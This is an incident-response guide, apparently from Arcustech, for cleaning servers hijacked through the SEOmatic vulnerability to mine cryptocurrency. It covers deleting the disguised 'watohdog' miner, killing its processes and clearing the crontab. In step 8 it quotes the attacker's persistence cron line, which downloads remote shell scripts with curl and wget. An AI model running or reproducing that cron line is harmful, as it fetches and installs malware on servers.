The following is an outline of the steps provided by Nevin Lyne from Arcustech to fix a server that's been compromised by the SEOmatic security vulnerability. These instructions are specific to servers that were hacked to be used for crypto currency mining. YMMV.

  1. ssh into your server.
  2. The files we're looking for live here: cd /tmp/systemd-private-e6cc411e8b01426e9d739a74be0a1e12-systemd-timesyncd.service-tmNLjm/tmp
  3. In that directory you should see two files. One is a json config and the other is the cryptocurrency mining binary. Delete those buggers. rm watohdog rm config.json
  4. Then find any active watohdog processes (In case you're wondering, that's the correct spelling. It's intended to mimic a legitimate service called watchdog that runs on some servers): ps ax | grep watohdog
  5. Grab the id (first column) from any watohdog processes you find and kill it using the following command: kill -9 [process id]
  6. TIP: It's worth noting that simply searching for watohdog using the command in step 5 will spawn a watohdog process. So don't be alarmed if you kill all of the processes and then see a new process pop back up if/when you search to verify that you nuked them all.
  7. TIP (via @mattgreyisok on Discord): If you think you found an offending watohdog process, but don't see a matching file (from step 2) run this command to find the path to the offending executable: readlink -f /proc/[process_id]/exe
  8. Remove anything suspicious looking from your crontab (crontab -e): */10 * * * * (curl -fsSL [<https://pastebin.com/raw/sRj0Lc8C||wget>](<https://pastebin.com/raw/sRj0Lc8C%7C%7Cwget>) -q -O [https://pastebin.com/raw/sRj0Lc8C||curl](<https://pastebin.com/raw/sRj0Lc8C%7C%7Ccurl>) -fsSL [<https://a.pomf.cat/rxxypc.sh||wget>](<https://a.pomf.cat/rxxypc.sh%7C%7Cwget>) -q -O - [https://a.pomf.cat/rxxypc.sh||curl](<https://a.pomf.cat/rxxypc.sh%7C%7Ccurl>) -fsSLk [<https://files.catbox.moe/6uvjoq.sh||wget>](<https://files.catbox.moe/6uvjoq.sh%7C%7Cwget>) -q -O
  9. Double check your server's stats to confirm—you should see CPU usage come back down to earth—but, fingers crossed, that should do it.

<aside> <img src="https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dc581e24-09c7-48dc-a950-c71be3f97c45/warning.svg" alt="https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dc581e24-09c7-48dc-a950-c71be3f97c45/warning.svg" width="40px" /> It's worth noting that, so far, all signs are pointing to these steps effectively scrubbing the server of any nastiness that was installed. But the only way to be absolutely sure the server is clean and that your data and users are safe is to start fresh with a new server or restoring from a full system snapshot taken before the exploit happened.

</aside>